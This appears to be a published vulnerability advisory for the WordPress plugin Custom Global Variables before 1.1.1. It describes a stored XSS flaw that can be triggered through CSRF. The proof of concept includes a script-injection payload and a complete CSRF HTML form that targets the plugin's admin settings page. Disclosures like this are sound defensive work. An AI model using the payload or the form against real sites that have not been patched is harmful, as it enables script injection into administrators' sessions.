Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)
Description
The plugin does not sanitise the 'name' field of the variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged in administrator add the payload and make them perform further unwanted actions.
Proof of Concept
As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add whatever value in the 'value' field and submit it
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
<input type="hidden" name="vars[1][name]" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="vars[1][val]" value="a" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in version 1.1.1✓
References
ExploitDB
Classification
Miscellaneous
Timeline
Publicly Published
2021-01-11 (about 8 months ago)
Added
2021-01-11 (about 8 months ago)
Last Updated
2021-03-10 (about 6 months ago)